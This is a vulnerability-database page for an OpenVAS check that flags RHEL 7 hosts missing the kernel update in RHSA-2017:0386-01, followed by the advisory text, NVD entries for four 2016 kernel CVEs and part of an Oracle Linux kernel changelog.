ID: OPENVAS:1361412562310871768 | Type: openvas | Reporter: Copyright (C) 2017 Greenbone Networks GmbH | Modified: 2018-11-16T00:00:00
Description
The remote host is missing an update for the 'kernel' package(s) announced via the referenced advisory.
###############################################################################
# OpenVAS Vulnerability Test
#
# RedHat Update for kernel RHSA-2017:0386-01
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Registration branch: the scanner first loads every VT with `description`
# set, runs only this block to register metadata, and exits. The detection
# code after this block is reached only on a real scan run.
if(description)
{
# Unique OID of this VT; its last component matches the plugin ID 871768.
script_oid("1.3.6.1.4.1.25623.1.0.871768");
script_version("$Revision: 12380 $");
script_tag(name:"last_modification", value:"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $");
script_tag(name:"creation_date", value:"2017-03-03 05:49:38 +0100 (Fri, 03 Mar 2017)");
# CVEs fixed by RHSA-2017:0386-01, so a hit can be correlated with them.
script_cve_id("CVE-2016-8630", "CVE-2016-8655", "CVE-2016-9083", "CVE-2016-9084");
# CVSS v2 score/vector for the advisory as a whole. It equals the 7.2 /
# AV:L/AC:L/Au:N/C:C/I:C/A:C that the NVD records further down this page give
# for CVE-2016-8655 and CVE-2016-9083; the other two CVEs rate lower there.
script_tag(name:"cvss_base", value:"7.2");
script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:C/I:C/A:C");
# Quality of detection "package": the verdict rests on installed RPM versions
# reported over SSH, not on the kernel that is actually booted.
script_tag(name:"qod_type", value:"package");
script_name("RedHat Update for kernel RHSA-2017:0386-01");
script_tag(name:"summary", value:"The remote host is missing an update for the 'kernel'
package(s) announced via the referenced advisory.");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
# Advisory text quoted from Red Hat. This is one multi-line string literal;
# keep it verbatim and do not place comments inside it.
script_tag(name:"insight", value:"The kernel packages contain the Linux
kernel, the core of any Linux operating system.
Security Fix(es):
* Linux kernel built with the Kernel-based Virtual Machine (CONFIG_KVM)
support is vulnerable to a null pointer dereference flaw. It could occur on
x86 platform, when emulating an undefined instruction. An attacker could
use this flaw to crash the host kernel resulting in DoS. (CVE-2016-8630,
Important)
* A race condition issue leading to a use-after-free flaw was found in the
way the raw packet sockets implementation in the Linux kernel networking
subsystem handled synchronization while creating the TPACKET_V3 ring
buffer. A local user able to open a raw packet socket (requires the
CAP_NET_RAW capability) could use this flaw to elevate their privileges on
the system. (CVE-2016-8655, Important)
* A flaw was discovered in the Linux kernel's implementation of VFIO. An
attacker issuing an ioctl can create a situation where memory is corrupted
and modify memory outside of the expected area. This may overwrite kernel
memory and subvert kernel execution. (CVE-2016-9083, Important)
* The use of a kzalloc with an integer multiplication allowed an integer
overflow condition to be reached in vfio_pci_intrs.c. This combined with
CVE-2016-9083 may allow an attacker to craft an attack and use unallocated
memory, potentially crashing the machine. (CVE-2016-9084, Moderate)
Red Hat would like to thank Philip Pettersson for reporting CVE-2016-8655.
Additional Changes:
Space precludes documenting all of the bug fixes and enhancements included
in this advisory. To see the complete list of bug fixes and enhancements,
refer to the linked KnowledgeBase article.");
# KnowledgeBase article referenced by the advisory text above.
script_xref(name:"URL", value:"https://access.redhat.com/articles/2940041");
script_tag(name:"affected", value:"kernel on
Red Hat Enterprise Linux Server (v. 7)");
script_tag(name:"solution", value:"Please Install the Updated Packages.");
# Vendor advisory identifier and its announcement-list archive.
script_xref(name:"RHSA", value:"2017:0386-01");
script_xref(name:"URL", value:"https://www.redhat.com/archives/rhsa-announce/2017-March/msg00008.html");
script_tag(name:"solution_type", value:"VendorFix");
# Non-intrusive category: the detection code only inspects the package
# inventory that an earlier VT gathered.
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2017 Greenbone Networks GmbH");
script_family("Red Hat Local Security Checks");
# The RPM inventory is produced by gather-package-list.nasl; this VT is not
# scheduled before it has run.
script_dependencies("gather-package-list.nasl");
# Run only when the SSH login identified a RHEL host with an RPM list and
# the recorded release key matches RHENT_7 (regex match on the key).
script_mandatory_keys("ssh/login/rhel", "ssh/login/rpms", re:"ssh/login/release=RHENT_7");
# Registration finished; the detection code below never runs in this mode.
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");
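# Detection run. The release string comes from the SSH-gathered KB entries
# (presumably the ssh/login/release key the mandatory-keys check required);
# without it there is nothing to compare against.
release = rpm_get_ssh_release();
if(!release) exit(0);

res = "";

if(release == "RHENT_7")
{
# Fixed EVR from RHSA-2017:0386-01. Every binary package built from the
# kernel SRPM carries the same version-release, so it is kept in one place
# instead of being repeated in each check.
fixed = "3.10.0~514.10.2.el7";

# Packages covered by the advisory, in the same order as the original
# unrolled checks so the first match (and hence the report) is unchanged.
pkgs = make_list("kernel-abi-whitelists",
"kernel-doc",
"kernel",
"kernel-debug",
"kernel-debug-debuginfo",
"kernel-debug-devel",
"kernel-debuginfo",
"kernel-debuginfo-common-x86_64",
"kernel-devel",
"kernel-headers",
"kernel-tools",
"kernel-tools-debuginfo",
"kernel-tools-libs",
"perf",
"perf-debuginfo",
"python-perf",
"python-perf-debuginfo");

# isrpmvuln() (pkg-lib-rpm.inc) returns a report string when the installed
# package is older than the fixed EVR and NULL otherwise; the first hit is
# reported and the VT stops. Note this compares installed RPM versions only:
# a host that has the fixed kernel installed but is still running the old
# one would presumably not be flagged here (qod_type "package").
foreach pkg (pkgs)
{
if ((res = isrpmvuln(pkg:pkg, rpm:pkg + "~" + fixed, rls:"RHENT_7")) != NULL)
{
security_message(data:res);
exit(0);
}
}

# __pkg_match is maintained by the package library; exit code 99 is the
# conventional "packages seen but none vulnerable" result, 0 means no
# covered package was found at all.
if (__pkg_match) exit(99);
exit(0);
}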
{"id": "OPENVAS:1361412562310871768", "type": "openvas", "bulletinFamily": "scanner", "title": "RedHat Update for kernel RHSA-2017:0386-01", "description": "The remote host is missing an update for the ", "published": "2017-03-03T00:00:00", "modified": "2018-11-16T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871768", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["2017:0386-01", "https://www.redhat.com/archives/rhsa-announce/2017-March/msg00008.html", "https://access.redhat.com/articles/2940041"], "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "lastseen": "2019-05-29T18:33:54", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-9083", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-8655"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2017-0386.NASL", "FEDORA_2016-EE3A114958.NASL", "ORACLELINUX_ELSA-2017-0386.NASL", "REDHAT-RHSA-2017-0386.NASL", "VIRTUOZZO_VZLSA-2017-0386.NASL", "FEDORA_2016-96D276367E.NASL", "ALA_ALAS-2016-772.NASL", "SL_20170302_KERNEL_ON_SL7_X.NASL", "ORACLELINUX_ELSA-2017-3514.NASL", "REDHAT-RHSA-2017-0387.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310851449", "OPENVAS:1361412562310871927", "OPENVAS:1361412562310842986", "OPENVAS:1361412562310842981", "OPENVAS:1361412562310842980", "OPENVAS:1361412562310810170", "OPENVAS:1361412562310810159", "OPENVAS:1361412562310882673", "OPENVAS:1361412562310810127", "OPENVAS:1361412562310842987"]}, {"type": "centos", "idList": ["CESA-2017:0386"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-0386-1", "ELSA-2017-3514", "ELSA-2017-0386"]}, {"type": "redhat", "idList": ["RHSA-2017:0387", "RHSA-2017:0402", "RHSA-2017:0386"]}, {"type": "f5", "idList": ["F5:K38472857"]}, {"type": "fedora", "idList": ["FEDORA:D89B960F8CA9", "FEDORA:8EB6260D0217", "FEDORA:3D4286087E43", "FEDORA:E2FD36125E3E"]}, {"type": 
"seebug", "idList": ["SSV:92567"]}, {"type": "amazon", "idList": ["ALAS-2016-772"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:3050-1", "OPENSUSE-SU-2016:3058-1"]}, {"type": "ubuntu", "idList": ["USN-3151-3", "USN-3151-4", "USN-3150-1", "USN-3152-1", "USN-3151-1", "USN-3152-2", "USN-3149-1", "USN-3151-2", "USN-3150-2", "USN-3149-2"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D5BBB161063632A8D15C357D43E97C75"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/LOCAL/AF_PACKET_CHOCOBO_ROOT_PRIV_ESC", "MSF:EXPLOIT/LINUX/LOCAL/AF_PACKET_CHOCOBO_ROOT_PRIV_ESC/"]}, {"type": "zdt", "idList": ["1337DAY-ID-26493", "1337DAY-ID-30429", "1337DAY-ID-33037"]}, {"type": "myhack58", "idList": ["MYHACK58:62201682103"]}, {"type": "archlinux", "idList": ["ASA-201612-5", "ASA-201612-7", "ASA-201612-8", "ASA-201612-6"]}, {"type": "threatpost", "idList": ["THREATPOST:71B135B09C0B20493E1A02875B015BA4"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147727"]}, {"type": "slackware", "idList": ["SSA-2016-347-01"]}, {"type": "exploitdb", "idList": ["EDB-ID:47170", "EDB-ID:40871", "EDB-ID:44696"]}, {"type": "thn", "idList": ["THN:04F5FC12455795F06BC21F5C803FA77E"]}], "modified": "2019-05-29T18:33:54", "rev": 2}, "score": {"value": 7.9, "vector": "NONE", "modified": "2019-05-29T18:33:54", "rev": 2}, "vulnersScore": 7.9}, "pluginID": "1361412562310871768", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2017:0386-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even 
the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871768\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-03 05:49:38 +0100 (Fri, 03 Mar 2017)\");\n script_cve_id(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2017:0386-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n * Linux kernel built with the Kernel-based Virtual Machine (CONFIG_KVM)\nsupport is vulnerable to a null pointer dereference flaw. It could occur on\nx86 platform, when emulating an undefined instruction. An attacker could\nuse this flaw to crash the host kernel resulting in DoS. 
(CVE-2016-8630,\nImportant)\n\n * A race condition issue leading to a use-after-free flaw was found in the\nway the raw packet sockets implementation in the Linux kernel networking\nsubsystem handled synchronization while creating the TPACKET_V3 ring\nbuffer. A local user able to open a raw packet socket (requires the\nCAP_NET_RAW capability) could use this flaw to elevate their privileges on\nthe system. (CVE-2016-8655, Important)\n\n * A flaw was discovered in the Linux kernel's implementation of VFIO. An\nattacker issuing an ioctl can create a situation where memory is corrupted\nand modify memory outside of the expected area. This may overwrite kernel\nmemory and subvert kernel execution. (CVE-2016-9083, Important)\n\n * The use of a kzalloc with an integer multiplication allowed an integer\noverflow condition to be reached in vfio_pci_intrs.c. This combined with\nCVE-2016-9083 may allow an attacker to craft an attack and use unallocated\nmemory, potentially crashing the machine. (CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting CVE-2016-8655.\n\nAdditional Changes:\n\nSpace precludes documenting all of the bug fixes and enhancements included\nin this advisory. To see the complete list of bug fixes and enhancements,\nrefer to the linked KnowledgeBase article.\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/2940041\");\n\n script_tag(name:\"affected\", value:\"kernel on\n Red Hat Enterprise Linux Server (v. 
7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:0386-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-March/msg00008.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Red Hat Local Security Checks"}
{"cve": [{"lastseen": "2020-12-09T20:07:44", "description": "drivers/vfio/pci/vfio_pci.c in the Linux kernel through 4.8.11 allows local users to bypass integer overflow checks, and cause a denial of service (memory corruption) or have unspecified other impact, by leveraging access to a vfio PCI device file for a VFIO_DEVICE_SET_IRQS ioctl call, aka a \"state machine confusion bug.\"", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-28T03:59:00", "title": "CVE-2016-9083", "type": "cve", "cwe": ["CWE-119", "CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9083"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/o:linux:linux_kernel:4.8.11"], "id": "CVE-2016-9083", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9083", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.8.11:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:44", "description": "drivers/vfio/pci/vfio_pci_intrs.c in the Linux kernel through 4.8.11 misuses the kzalloc function, which allows local users to cause a denial of service (integer 
overflow) or have unspecified other impact by leveraging access to a vfio PCI device file.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-28T03:59:00", "title": "CVE-2016-9084", "type": "cve", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9084"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/o:linux:linux_kernel:4.8.11"], "id": "CVE-2016-9084", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9084", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.8.11:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:43", "description": "The x86_decode_insn function in arch/x86/kvm/emulate.c in the Linux kernel before 4.8.7, when KVM is enabled, allows local users to cause a denial of service (host OS crash) via a certain use of a ModR/M byte in an undefined instruction.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", 
"integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-11-28T03:59:00", "title": "CVE-2016-8630", "type": "cve", "cwe": ["CWE-284", "CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8630"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/o:linux:linux_kernel:4.8.6"], "id": "CVE-2016-8630", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8630", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.8.6:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:43", "description": "Race condition in net/packet/af_packet.c in the Linux kernel through 4.8.12 allows local users to gain privileges or cause a denial of service (use-after-free) by leveraging the CAP_NET_RAW capability to change a socket version, related to the packet_set_ring and packet_setsockopt functions.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-08T08:59:00", "title": 
"CVE-2016-8655", "type": "cve", "cwe": ["CWE-362", "CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8655"], "modified": "2018-05-25T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.8.12"], "id": "CVE-2016-8655", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8655", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.8.12:*:*:*:*:*:*:*"]}], "oraclelinux": [{"lastseen": "2020-12-30T19:17:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "description": "- [3.10.0-514.6.10.0.1.el7]\n- [ipc] ipc/sem.c: bugfix for semctl(,,GETZCNT) (Manfred Spraul) [orabug 22552377]\n- Oracle Linux certificates (Alexey Petrenko)\n- Oracle Linux RHCK Module Signing Key was compiled into kernel (olkmod_signing_key.x509)(alexey.petrenko@oracle.com)\n- Update x509.genkey [bug 24817676]", "edition": 6, "modified": "2017-03-03T00:00:00", "published": "2017-03-03T00:00:00", "id": "ELSA-2017-0386-1", "href": "http://linux.oracle.com/errata/ELSA-2017-0386-1.html", "title": "kernel security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:41", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "description": "- [3.10.0-514.10.2.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n- Oracle Linux RHCK Module Signing Key was 
compiled into kernel (olkmod_signing_key.x509)(alexey.petrenko@oracle.com)\n- Update x509.genkey [bug 24817676]\n[3.10.0-514.10.2]\n- [net] dccp: fix freeing skb too early for IPV6_RECVPKTINFO (Hannes Frederic Sowa) [1423462 1423463]\n[3.10.0-514.10.1]\n- [block] blk-mq: Fix NULL pointer updating nr_requests (David Milburn) [1416133 1384066]\n- [scsi] cxlflash: Fix crash in cxlflash_restore_luntable() (Gustavo Duarte) [1415146 1400524]\n- [scsi] cxlflash: Improve context_reset() logic (Gustavo Duarte) [1415146 1400524]\n- [scsi] cxlflash: Avoid command room violation (Gustavo Duarte) [1415146 1400524]\n- [x86] Mark Kaby Lake with Kaby Lake PCH as supported (David Arcari) [1415094 1391219]\n- [scsi] be2iscsi: Add checks to validate completions (Maurizio Lombardi) [1414687 1324918]\n- [scsi] be2iscsi: Fix bad WRB index error (Maurizio Lombardi) [1414687 1324918]\n- [scsi] be2iscsi: Add lock to protect WRB alloc and free (Maurizio Lombardi) [1414687 1324918]\n- [mm] meminit: initialise more memory for inode/dentry hash tables in early boot (Yasuaki Ishimatsu) [1413623 1404584]\n- [s390] mem_detect: Revert 'add DAT sanity check' (Hendrik Brueckner) [1413600 1391540]\n- [cpufreq] intel_pstate: Fix code ordering in intel_pstate_set_policy() (Prarit Bhargava) [1411818 1398072]\n- [scsi] cxlflash: Improve EEH recovery time (Steve Best) [1402442 1397588]\n- [scsi] cxlflash: Fix to avoid EEH and host reset collisions (Steve Best) [1402442 1397588]\n- [scsi] cxlflash: Remove the device cleanly in the system shutdown path (Steve Best) [1402442 1397588]\n- [scsi] cxlflash: Scan host only after the port is ready for I/O (Steve Best) [1402442 1397588]\n- [x86] kvm: x86: Check memopp before dereference (Mateusz Guzik) [1395805 1395806] {CVE-2016-8630}\n- [vfio] pci: Fix integer overflows, bitmask check (Mateusz Guzik) [1394627 1394991 1394628 1394992] {CVE-2016-9083 CVE-2016-9084}\n- [acpi] acpi / scan: use platform bus type by default for _HID enumeration (Tony Camuso) [1393727 
1383505]\n- [acpi] acpi / scan: introduce platform_id device PNP type flag (Tony Camuso) [1393727 1383505]\n- [char] ipmi: Convert the IPMI SI ACPI handling to a platform device (Tony Camuso) [1393727 1383505]\n- [acpi] acpi / ipmi: Cleanup coding styles (David Arcari) [1393725 1373703]\n- [acpi] acpi / ipmi: Cleanup some inclusion codes (David Arcari) [1393725 1373703]\n- [acpi] acpi / ipmi: Cleanup some initialization codes (David Arcari) [1393725 1373703]\n- [acpi] acpi / ipmi: Cleanup several acpi_ipmi_device members (David Arcari) [1393725 1373703]\n- [acpi] acpi / ipmi: Add reference counting for ACPI IPMI transfers (David Arcari) [1393725 1373703]\n- [acpi] acpi / ipmi: Use global IPMI operation region handler (David Arcari) [1393725 1373703]\n- [acpi] acpi / ipmi: Fix race caused by the unprotected ACPI IPMI user (David Arcari) [1393725 1373703]\n- [acpi] acpi / ipmi: Fix race caused by the timed out ACPI IPMI transfers (David Arcari) [1393725 1373703]\n- [acpi] acpi / ipmi: Fix race caused by the unprotected ACPI IPMI transfers (David Arcari) [1393725 1373703]\n- [acpi] acpi / ipmi: Fix potential response buffer overflow 